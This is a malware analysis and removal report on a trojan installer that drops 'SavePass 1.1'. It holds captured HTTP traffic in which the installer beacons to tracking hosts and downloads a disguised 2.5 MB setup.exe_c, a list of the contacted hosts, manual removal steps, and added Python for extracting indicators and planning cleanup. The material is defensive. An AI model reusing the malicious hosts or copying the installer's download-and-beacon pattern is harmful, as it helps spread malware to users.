GET /utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: closeGIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_c HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461996"
Last-Modified: Wed, 04 Mar 2015 09:39:56 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop012.fr7.t,1425597835.cds019.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds002.dc1.c,1425597835.cds019.fr7.pr
[binary response body omitted: 2530652 bytes of the downloaded setup.exe_c, served with Content-Type text/plain; the capture is truncated here ("<<< skipped >>>")]
GET /utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:59 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
[binary response body omitted: 43-byte GIF89a image]
GET /utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
[binary response body omitted: 43-byte GIF89a image]
The Trojan connects to the servers at the following location(s) (hosts observed in the captured HTTP traffic above):
stats.ourinputdatastorage.com
errors.crossrider.com
dl.ourgenstatsstorage.com
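The capture above is raw request/response text with image and executable bodies interleaved. The Python below is an added example, not part of the Lavasoft report: it parses a copy of those six exchanges (bodies dropped and the long apps.gif query shortened; both are constructed from the lines above) and extracts the network indicators a responder would block: the three contacted hosts, the tracking-pixel events reported to stats.ourinputdatastorage.com and errors.crossrider.com, and the 2.5 MB setup.exe_c download that the server labels text/plain. The size thresholds are assumptions chosen from this capture.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the six exchanges from the capture above with the binary
# bodies removed and the long apps.gif query string shortened.
CAPTURE = """\
GET /apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&browser=ie&country=ua&silent=1&crtnm=BlondieProject HTTP/1.1
Host: stats.ourinputdatastorage.com
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 35
GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1
Host: errors.crossrider.com
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
GET /utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 HTTP/1.1
Host: errors.crossrider.com
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
GET /outil/fuully/styi2/setup.exe_c HTTP/1.1
Host: dl.ourgenstatsstorage.com
HTTP/1.1 200 OK
Content-Length: 2530652
Content-Type: text/plain
GET /utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 HTTP/1.1
Host: errors.crossrider.com
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
GET /utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 HTTP/1.1
Host: errors.crossrider.com
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
"""

REQUEST_RE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/\d\.\d$")
STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})\b")
BEACON_MAX_BYTES = 64  # assumption: the tracking GIFs in this capture are 35-43 bytes


@dataclass
class Exchange:
    method: str
    target: str
    req_headers: dict = field(default_factory=dict)
    status: int = 0
    resp_headers: dict = field(default_factory=dict)

    @property
    def host(self): return self.req_headers.get("host", "")
    @property
    def path(self): return urlsplit(self.target).path
    @property
    def query(self):
        qs = parse_qs(urlsplit(self.target).query, keep_blank_values=True)
        return {k: v[0] for k, v in qs.items()}
    @property
    def content_length(self): return int(self.resp_headers.get("content-length", "0"))
    @property
    def content_type(self): return self.resp_headers.get("content-type", "").lower()


def parse_capture(text):
    """Split the flat request/response text into Exchange records."""
    exchanges, current, in_response = [], None, False
    for line in text.splitlines():
        if m := REQUEST_RE.match(line):          # a new request starts a record
            current = Exchange(m.group(1), m.group(2))
            exchanges.append(current)
            in_response = False
        elif current is None:
            continue
        elif s := STATUS_RE.match(line):         # status line: headers now belong to the response
            current.status = int(s.group(1))
            in_response = True
        elif ":" in line:
            name, _, value = line.partition(":")
            headers = current.resp_headers if in_response else current.req_headers
            headers[name.strip().lower()] = value.strip()
    return exchanges


def classify(ex):
    """Tracking pixel, disguised executable download, or other."""
    if ex.content_type.startswith("image/gif") and ex.content_length <= BEACON_MAX_BYTES and ex.query:
        return "beacon"
    # A multi-megabyte body labelled text/plain from a path named setup.exe_c is the
    # installer download; the label is no reason for a proxy to pass it unscanned.
    if ex.content_length > 1_000_000 and not ex.content_type.startswith("application/"):
        return "disguised-download"
    return "other"


def network_iocs(text):
    """Hosts to block, beacon event names in order, and disguised downloads."""
    exchanges = parse_capture(text)
    return {
        "hosts": sorted({ex.host for ex in exchanges}),
        "beacon_events": [ex.query.get("n") or ex.query.get("report") or ex.query.get("action")
                          for ex in exchanges if classify(ex) == "beacon"],
        "downloads": [(ex.host, ex.path, ex.content_length)
                      for ex in exchanges if classify(ex) == "disguised-download"],
    }
```

The beacon ordering (install, ms_start_download, ms_about_to_exc, ms_download_success, mini_s) is the installer's own progress reporting, which is why matching on the `n=` and `report=` query keys is a more stable detection than matching on the `rnd=` cache-buster or the GIF response.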
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
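The manual-removal steps above use the report's own placeholders (%WinDir%, %Program Files%, %Documents and Settings%\%current user%, %original file name%) and list every ping.exe instance the dropper spawned. The Python below is an added example, not anything from the report: it turns that list into a checkable plan by resolving the placeholders against a Windows environment (the placeholder-to-variable mapping is an assumption for the Windows XP SP3 host the sample was analysed on), keeping the unresolvable %original file name% entry visible instead of guessing it, treating the .job file under %WinDir%\Tasks as a scheduled task to remove with schtasks as well as a file, and refusing to delete ping.exe, which is an OS binary the dropper merely ran. The entries and the set of "present" paths are constructed from the lists above.

```python
import ntpath

# Assumption: how the report's placeholders map to XP-era environment variables.
PLACEHOLDERS = {
    "%Documents and Settings%\\%current user%": "USERPROFILE",
    "%Program Files%": "ProgramFiles",
    "%WinDir%": "SystemRoot",
}
# OS binaries the dropper merely executes: terminate the instances, never delete the file.
SYSTEM_TOOLS = {"ping.exe"}

# Constructed subset of the report's process and file lists.
REPORT_PROCESSES = ["Ywuovtbypk.exe:468", "e33a47b.exe:324", "%original file name%.exe:228",
                    "ping.exe:1948", "ping.exe:596"]
REPORT_FILES = [
    "%WinDir%\\Tasks\\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)",
    "%Program Files%\\SavePass 1.1\\utils.exe (80413 bytes)",
    "%Documents and Settings%\\%current user%\\Local Settings\\Temp\\nsc2.tmp\\Ywuovtbypk.exe (5217358 bytes)",
    "%Documents and Settings%\\%current user%\\Local Settings\\Temp\\11995.bat (407 bytes)",
]
# Constructed environment and the paths assumed to still exist on the host being cleaned.
XP_ENV = {"SystemRoot": "C:\\WINDOWS", "ProgramFiles": "C:\\Program Files",
          "USERPROFILE": "C:\\Documents and Settings\\Administrator"}
PRESENT = {
    "C:\\WINDOWS\\Tasks\\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job",
    "C:\\Program Files\\SavePass 1.1\\utils.exe",
}


def expand_report_path(entry, env):
    """'%WinDir%\\Tasks\\x.job (72 bytes)' -> 'C:\\WINDOWS\\Tasks\\x.job'; None if a placeholder is unknown."""
    path = entry.rsplit(" (", 1)[0]  # drop the '(N bytes)' size annotation
    for placeholder, var in PLACEHOLDERS.items():
        if path.startswith(placeholder):
            path = env[var] + path[len(placeholder):]
            break
    return None if "%" in path else path


def removal_plan(report_files, report_processes, env, exists):
    """Group the report's entries into actions; exists(path) reports whether a path is present."""
    plan = {"terminate": [], "delete": [], "tasks": [], "absent": [], "unresolved": []}
    for proc in report_processes:
        name = proc.rsplit(":", 1)[0]  # strip the ':PID' from the analysis run; PIDs differ per host
        if "%" in name:
            plan["unresolved"].append(name)  # e.g. %original file name%.exe: the sample's real name
        elif name not in plan["terminate"]:
            plan["terminate"].append(name)
    for entry in report_files:
        path = expand_report_path(entry, env)
        if path is None:
            plan["unresolved"].append(entry)
            continue
        if ntpath.basename(path).lower() in SYSTEM_TOOLS:
            continue
        if not exists(path):
            plan["absent"].append(path)
            continue
        if ntpath.dirname(path).lower().endswith("\\tasks") and path.lower().endswith(".job"):
            # A .job in the Tasks folder is a scheduled task: unregister it (schtasks /delete /tn NAME)
            # so the scheduler does not recreate or keep running the dropped component.
            plan["tasks"].append(ntpath.basename(path)[:-4])
        plan["delete"].append(path)
    return plan


if __name__ == "__main__":
    for action, items in removal_plan(REPORT_FILES, REPORT_PROCESSES, XP_ENV, lambda p: p in PRESENT).items():
        print(action, items)
```

On a live host, pass `os.environ` and `os.path.exists` instead of the constructed `XP_ENV` and `PRESENT`; the "absent" and "unresolved" lists are the items to verify by hand before trusting the cleanup as complete.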